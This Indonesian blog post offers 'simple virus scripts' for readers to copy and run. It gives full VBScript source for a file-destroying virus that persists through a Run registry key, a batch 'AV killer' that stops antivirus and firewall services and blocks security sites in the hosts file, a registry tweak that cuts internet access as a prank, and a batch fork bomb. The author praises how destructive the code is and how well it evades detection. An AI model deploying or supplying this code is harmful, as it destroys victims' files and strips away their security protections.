Ketik disini apa yang anda cari

Jumat, 25 Maret 2011

contoh script Virus Sederhana


Code Registry Untuk Menghilangkan AKses Internet
Anda Ingin Mendisable Atau Menghilangkan Akses Internet sebuah Komputer?!Mungkin
anda ingin mengerjain teman anda.Anda Tak Perlu susah-susah mencari software atau
tool untuk melakukannya Anda Hanya Perlu MembUKA Notepad Dan Mengetikan Perintah
Dibawah ini
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3]
"1803"=dword:00000000
Lalu Simpan Dalam Format .reg untuk mengaktifkan atau mengenable internet lagi di
dalam komputer tersebut anda cukup menggunakan kode
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3]
"1803"=dword:00000003
Dan Simpan Dalam Format .reg,Jangan Lpa DI Double klik ya
Souce Code Virus VBS.Pluta.A
Virus Ini Kalau Terdeteksi Oleh Kapesky Bernama Trojan.Win32.KillFiles.nx Kalau
ClamAv VBS.Pluta.A.
Dan Jika discan dengan Norman,NOD32 DAn AVG maka Tak Akan terdeteksi Virus,Padahal
Virus Ini Sangat Berbahaya.Cara Kerja Virus Ini Adalah Mengecek Tanggal Dan Bulan
Jika Bukan Tanggal Lahirq Atau Pacarq Maka Virus Ini Akan Mengcopy Ke %systemroot
%\system32\ Dan Merubah Registry di:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\ agar setiap
booting maka file virus ini akan aktif.Dan Jika Ini Adalah Ulang Tahunku Atau
Pacarq Maka Virus Ini AKan Menginfeksi Semua File Berjenis .jpg, .gif, .log, .ini,
.doc and .exe.
Code Virus Ada Dibawah
Code:
On Error Resume Next
dim
FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,
newFileData,copySelfComplete
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir=FSobj.GetSpecialFolder(1)
checkDate()
function checkDate()
if (day(Now)=16 and month(Now)=2)or(day(Now)=29 and month(Now)=3) then
beginInfestation()
displayMessage()
else
plantTrojanizedFile()
end if
end function
function plantTrojanizedFile()
set copySelf=FSobj.CreateTextFile(sysDir+"\sys-dlBD.vbs")
copySelf.close
set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
writeCopy()
hackedFileData=replace(rawFileData,chr(42),chr(68))
fixData=replace(hackedFileData,chr(37),chr(76))
dataFixed=replace(fixData,chr(124),chr(46))
newFileData=replace(dataFixed,chr(94),"""")
set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-dlBD.vbs",2)
copySelfComplete.write newFileData
copySelfComplete.close
createRegKey
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysdlBD",sysDir&
"\sys-dlBD.vbs"
end function
sub createRegKey(regKey,regVal)
dim regEdit
set regEdit=CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
sub beginInfestation
On Error Resume Next
dim drive,machine,complete
set machine=FSobj.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next
beginInfestation=complete
end sub
sub indexFolders(location)
On Error Resume Next
dim specs, file, subFol
set specs=FSobj.GetFolder(location)
set subFol=specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub
sub spreadData(location)
On Error Resume Next
dim
folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,
finalMes,extName,complete
set folder=FSobj.GetFolder(location)
set directory=folder.Files
orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/dlBD
Virus...Written by *|%|"
mesStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))
complete=lcase(file.Name)
if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub
function displayMessage()
dim shell,messageFile
set shell = CreateObject("WScript.Shell")
set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
messageFile.close
set FSobj=CreateObject("Scripting.FileSystemObject")
set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/dlBD Virus")
messageFile.WriteLine("@cls")
messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been infected
with the VBS/dlBD Virus :(")
messageFile.WriteLine("@echo.")
messageFile.WriteLine("@pause")
messageFile.close
shell.Run(sysDir&"\dlBD-mes.bat")
end function
function writeCopy()
rawFileData="rem - VBS/dlBD ^DL BirthDay^ Virus by *|%|" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim FSobj,winDir,sysDir" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set sysDir=FSobj|GetSpecialFolder(1)" &vbcrlf& _
"checkDate()" &vbcrlf& _
"function checkDate()" &vbcrlf& _
"if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then" &vbcrlf&
_
"beginInfestation()" &vbcrlf& _
"displayMessage()" &vbcrlf& _
"end if" &vbcrlf& _
"end function" &vbcrlf& _
"sub beginInfestation" &vbcrlf& _
"On Error Resume Next " &vbcrlf& _
"dim drive,machine,complete" &vbcrlf& _
"set machine=FSobj|Drives " &vbcrlf& _
"for each drive in machine " &vbcrlf& _
"if (drive|DriveType=2)or(drive|DriveType=3) then" &vbcrlf& _
"indexFolders(drive|Path&^\^)" &vbcrlf& _
"end If" &vbcrlf& _
"next" &vbcrlf& _
"beginInfestation=complete" &vbcrlf& _
"end sub" &vbcrlf& _
"sub indexFolders(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim specs, file, subFol" &vbcrlf& _
"set specs=FSobj|GetFolder(location)" &vbcrlf& _
"set subFol=specs|SubFolders" &vbcrlf& _
"for each file in subFol" &vbcrlf& _
"spreadData(file|Path)" &vbcrlf& _
"indexFolders(file|Path)" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"sub spreadData(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim
folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,
finalMes,extName,complete" &vbcrlf& _
"set folder=FSobj|GetFolder(location)" &vbcrlf& _
"set directory=folder|Files" &vbcrlf& _
"finalMes=^Happy BirthDay to me! :) - You have been infected with the VBS/dlBD
Virus...Written by *|%|^" &vbcrlf& _
"for each file in directory" &vbcrlf& _
"extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
"complete=lcase(file|Name)" &vbcrlf& _
"if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes " &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"end if" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"function displayMessage()" &vbcrlf& _
"dim shell,messageFile" &vbcrlf& _
"set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
"messageFile|close" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
"messageFile|WriteLine(^@title Happy Birthday to me! :) - VBS/dlBD Virus - by *|%|
^)" &vbcrlf& _
"messageFile|WriteLine(^@cls^)" &vbcrlf& _
"messageFile|WriteLine(^@echo Happy BirthDay to me! :) - You have been infected
with the VBS/dlBD Virus :(^)" &vbcrlf& _
"messageFile|WriteLine(^@echo|^)" &vbcrlf& _
"messageFile|WriteLine(^@pause^)" &vbcrlf& _
"messageFile|close" &vbcrlf& _
"shell|Run(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
"end function"
end function
Source Code Av Killer
Mungkin Code INi Blum Bisa Dibilang Virus Tapi Ini Bila DiGabung Dengan Kode Virus
Batch Lainnya Maka Akan Jadi Sangat Mengerikan,DIbawah Ini Adalah Kode AV Killer
Dalam Eksitensi Bat.Cara Kerjanya Adalah dengan membunuh Antivirus yang ada di
Komputer Lalu MemBlock Semua Website Security.CUkup Keren Menurut Saya.Kodenya Ada
DIbawah Ini :
set huku=net stop
%huku% “Security Center”
%huku% SharedAccess
netsh firewall set opmode mode=disable
%huku% AVP.EXE
%huku% CFINET32
%huku% CFINET
%huku% ICMON
%huku% SAFEWEB
%huku% WEBSCANX
%huku% ANTIVIR
%huku% MCAFEE
%huku% NORTON
%huku% NVC95
%huku% FP-WIN
%huku% IOMON98
%huku% PCCWIN98
%huku% F-PROT95
%huku% F-STOPW
%huku% PVIEW95
%huku% NAVWNT
%huku% NAVRUNR
%huku% NAVLU32
%huku% NAVAPSVC
%huku% NISUM
%huku% SYMPROXYSVC
%huku% RESCUE32
%huku% NISSERV
%huku% ATRACK
%huku% IAMAPP
%huku% LUCOMSERVER
%huku% LUALL
%huku% NMAIN
%huku% NAVW32
%huku% NAVAPW32
%huku% VSSTAT
%huku% VSHWIN32
%huku% AVSYNMGR
%huku% AVCONSOL
%huku% WEBTRAP
%huku% POP3TRAP
%huku% PCCMAIN
%huku% PCCIOMON
%huku% AHNLAB
%huku% KIMLAB
%huku% MONSYSNT
%huku% MONSVCNT
%huku% NAVAPW32
%huku% NAVAPSVC
%huku% NAVW32
%huku% NAVWNT
%huku% V3PRO32
%huku% V3
%huku% V3CFGU
%huku% V3P3AT
%huku% knlscan
%huku% scanner.exe
%huku% scanner
%huku% SpiderNT
%huku% SpiderUI
%huku% spider
%huku% Vcrmon
%huku% vcr32
%huku% kavsvc
%huku% kav.exe
%huku% KVAgent
%huku% KVDOS
%huku% KVSrvXP
%huku% KVwsc
%huku% kvwsc
%huku% RavMon
%huku% RavMonD.exe
%huku% RavMonD
%huku% RAV.exe
%huku% WATCHER
%huku% avgupsvc
%huku% avgamsvr
%huku% avgemc
%huku% avgupsvc
%huku% zlclient
%huku% AszMon.exe
%huku% AszTray.exe
%huku% AhnRpt
%huku% mssvc
%huku% ADSpider.exe
%huku% firedaemon.exe
%huku% servudaemon.exe
%huku% firedaemon
%huku% CCAPP.exe
%huku% servu.exe
%huku% McVSEscn.exe
%huku% mcagent.exe
%huku% fxsvc.exe
%huku% clisvc.exe
%huku% vrmonsvc.exe
%huku% dllhost.exe
%huku% RsRavMon
%huku% RsCCenter
%huku% Norton AntiVirus Server
%huku% Norton AntiVirus
%huku% Serv-U
%huku% Norton AntiVirus Auto Protect Service
%huku% Norton AntiVirus Client
%huku% Symantec AntiVirus Client
%huku% Norton AntiVirus Server
%huku% NAV Alert
%huku% Nav Auto-Protect
%huku% McShield
%huku% DefWatch
%huku% eventlog
%huku% WMDM PMSP Service
%huku% lmhosts
%huku% eventlog
%huku% InoRPC
%huku% InoRT
%huku% InoTask
%huku% IREIKE
%huku% IPSECMON
%huku% GhostStartService
%huku% SharedAccess
%huku% NAVAPSVC
%huku% NISUM
%huku% SymProxySvc
%huku% NISSERV
%huku% ntrtscan
%huku% tmlisten
%huku% PccPfw
%huku% tmproxy
%huku% Tmntsrv
%huku% PCCPF
%huku% AvSynMgr
%huku% McAfeeFramework
%huku% Micorsoft Network Firewall Service
%huku% avgServ
%huku% MonSvcNT
%huku% V3MonNT
%huku% V3MonSvc
%huku% spidernt
%huku% MCVSrte
%huku% SweepNet
%huku% SWEEPSRV.SYS
%huku% Aavgupsvc
%huku% KVAgent
%huku% KVDos.exe
%huku% KVSrvXP.exe
%huku% kvwsc.exe
%huku% DefWatch.exe
%huku% DWHWizrd.exe
%huku% LDVPREG.exe
%huku% LuaWrap.exe
%huku% Rtvscan.exe
%huku% SavRoam.exe
%huku% SymClnUp.exe
%huku% VPC32.exe
%huku% VPDN_LU.exe
%huku% VPTray.exe
%huku% viruscan
%huku% viruscan.inf
%huku% viruscan1.dat
%huku% viruscan2.dat
%huku% GhostStartTrayApp
%huku% GhReboot
%huku% ghstwalk
%huku% ghwrap
%huku% Ghost Boot Wizard
%huku% ghost
%huku% Ghostexp
%huku% GhostStart
%huku% GhostStartService
%huku% AVG RESIDENT SHIELD
%huku% "Turbo Vaccine Monitoring Service"
%huku% "MonSvcNT"
%huku% "rising process communication center"
%huku% "rising realtime monitor service"
%huku% "OfficeScanNT Monitor"
%huku% "RemoteAgent"
%huku% "Ahnlab Task Scheduler"
%huku% "Panda Antivirus"
%huku% "ZoneAlarm"
%huku% "Detector de OfficeScanNT"
%huku% "Symantec Proxy Service"
%huku% "Symantec Event Manager"
%huku% "Norton Internet Security Accounts Manager"
%huku% "Norton Internet Security Proxy Srvice"
%huku% "Norton Internet Security service"
%huku% "Norton AntiVirus Server"
%huku% "Norton AntiVirus Auto Protect Service"
%huku% "Norton AntiVirus Client"
%huku% "Norton AntiVirus Corporate Edition"
%huku% "ViRobot Professional Monitoring"
%huku% "PC-cillin Personal Firewall"
%huku% "Trend Micro Proxy Service"
%huku% "Trend NT Realtime Service"
%huku% "Trend Micro Real-time Service"
%huku% "Trend Micro Personal Firewall
%huku% "Trend Micro Central Control Component""
%huku% "McAfee.com McShield"
%huku% "McAfee.com VirusScan Online Realtime Engine"
%huku% "McAfee Agent"
%huku% " McAfee SecurityCenter Update Manager "
%huku% "McShield"
%huku% "SyGateService"
%huku% "Sygate Personal Firewall Pro"
%huku% "Sygate Personal Firewall"
%huku% "Sophos Anti-Virus"
%huku% "Sophos Anti-Virus Network"
%huku% "eTrust Antivirus Job Server"
%huku% "eTrust Antivirus Realtime Server"
%huku% "eTrust Antivirus RPC Server"
%huku% "ViRobot Expert Monitoring"
%huku% "ViRobot Lite Monitoring"
%huku% "Quick Heal Online Protection"
%huku% "V3MonNT"
%huku% "V3MonSvc"
%huku% "Security Center"
%huku% "Windows Firewall"
%huku% "Windows Internet Connection Sharing(ICS)"
%huku% "NAV Alert"
%huku% "NAV Auto-Protect"
%huku% "ScriptBlocking Service"
%huku% "DefWatch"
%huku% "Background Intelligent Transfer Service"
%huku% "System Event Notification"
%huku% "BlackICE"
%huku% "AVSync Manager"
%huku% "AVG7 Alert Manager Server"
%huku% "AVG7 Update Service"
%huku% "InVircible Scheduler"
%huku% "kavsvc"
%huku% "avast! Antivirus"
%huku% "avast! iAVS4 Control Service"
%huku% "Trend ServerProtect Agent"
%huku% "Trend ServerProtect "
%huku% "AVG6 Service"
%huku% "AVG RESIDENT SHIELD"
%huku% "nod32kui"
%huku% nod32kui
%huku% "nod32krn"
%huku% nod32krn
%huku% "nod32krn.exe"
%huku% nod32krn.exe
%huku% "Turbo Vaccine Monitoring Service"
%huku% "MonSvcNT"
%huku% "rising process communication center"
%huku% "rising realtime monitor service"
%huku% "OfficeScanNT Monitor"
%huku% "RemoteAgent"
%huku% "Ahnlab Task Scheduler"
%huku% "Panda Antivirus"
%huku% "ZoneAlarm"
%huku% "Detector de OfficeScanNT"
%huku% "Symantec Proxy Service"
%huku% "Symantec Event Manager"
%huku% "Norton Internet Security Accounts Manager"
%huku% "Norton Internet Security Proxy Srvice"
%huku% "Norton Internet Security service"
%huku% "Norton AntiVirus Server"
%huku% "Norton AntiVirus Auto Protect Service"
%huku% "Norton AntiVirus Client"
%huku% "Norton AntiVirus Corporate Edition"
%huku% "ViRobot Professional Monitoring"
%huku% "PC-cillin Personal Firewall"
%huku% "Trend Micro Proxy Service"
%huku% "Trend NT Realtime Service"
%huku% "Trend Micro Real-time Service"
%huku% "Trend Micro Personal Firewall
%huku% "Trend Micro Central Control Component""
%huku% "McAfee.com McShield"
%huku% "McAfee.com VirusScan Online Realtime Engine"
%huku% "McAfee Agent"
%huku% " McAfee SecurityCenter Update Manager "
%huku% "McShield"
%huku% "SyGateService"
%huku% "Sygate Personal Firewall Pro"
%huku% "Sygate Personal Firewall"
%huku% "Sophos Anti-Virus"
%huku% "Sophos Anti-Virus Network"
%huku% "eTrust Antivirus Job Server"
%huku% "eTrust Antivirus Realtime Server"
%huku% "eTrust Antivirus RPC Server"
%huku% "ViRobot Expert Monitoring"
%huku% "ViRobot Lite Monitoring"
%huku% "Quick Heal Online Protection"
%huku% "V3MonNT"
%huku% "V3MonSvc"
%huku% "Security Center"
%huku% "Windows Firewall"
%huku% "Windows Internet Connection Sharing(ICS)"
%huku% "NAV Alert"
%huku% "NAV Auto-Protect"
%huku% "ScriptBlocking Service"
%huku% "DefWatch"
%huku% "Background Intelligent Transfer Service"
%huku% "System Event Notification"
%huku% "BlackICE"
%huku% "AVSync Manager"
%huku% "AVG7 Alert Manager Server"
%huku% "AVG7 Update Service"
%huku% "InVircible Scheduler"
%huku% "kavsvc"
%huku% "avast! Antivirus"
%huku% "avast! iAVS4 Control Service"
%huku% "Trend ServerProtect Agent"
%huku% "Trend ServerProtect "
%huku% "AVG6 Service"
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
tskill alg.exe
if exist "C:\Programme\Avira\AntiVir PersonalEdition Classic" del /F /S /Q
"C:\Programme\Avira\AntiVir PersonalEdition Classic\*.*"
echo 127.0.0.1 www.symantec.com >%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 securityresponse.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 liveupdate.symantecliveupdate.com >>%windir
%\system32\drivers\etc\hosts
echo 127.0.0.1 www.viruslist.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 viruslist.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 f-secure.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.f-secure.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.avp.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 avp.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.networkassociates.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 networkassociates.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.ca.com ca.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mast.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 my-etrust.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.my-etrust.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 download.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 dispatch.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 secure.nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 update.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 updates.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 us.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 liveupdate.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 customer.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 rads.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 metalhead2005.info >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 gfx-dose.de >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.gfx-dose.de >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 irc.blackcarder.net >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 d66.myleftnut.info >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.symantec.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.sophos.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.avast.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.mcafee.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.f-prot.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.f-secure.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.avp.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.kaspersky.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.bitdefender.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.my-etrust.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.eset.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.norman.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.grisoft.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.google.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 mx1.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 mx2.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 messenger.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.google.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.youtube.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.youtube.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.yahoo.com>>c:\windows\system32\Drivers\Etc\Hosts
echo [HKLM\SYSTEM\ControlSet001\Services\wuauserv] >>C:\reg.reg
echo Start=dword:00000004 >>C:\reg.reg
echo [HKLM\SYSTEM\ControlSet001\Services\wscsvc] >>C:\reg.reg
echo Start=dword:00000004 >>C:\reg.reg
regedit /s C:\reg.reg
Source Code Virus Batch Paling Simpler
Ini Kode Virus Paling SImple Yang Saya Tahu Codenya Adah :
%0|%0
Ya Memang Hanya 5 Character,tapi silahkan saveas di notepad dengan nama
namafile.bat.Dengan double klik maka komputer anda akan mengalami Crash dengan 500
lebih program akan terbuka.Simple dan Menghancurkaan.Sekali Fork Bom DIaktifkan
dalam komputer maka Tidak Ada Cara Lain Selain Merestart Komputer.Menghentikan
Fork Bom dengan Task Manager Adalah Hal Yang Mustahil

Tidak ada komentar:

Posting Komentar

by Tania ja Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger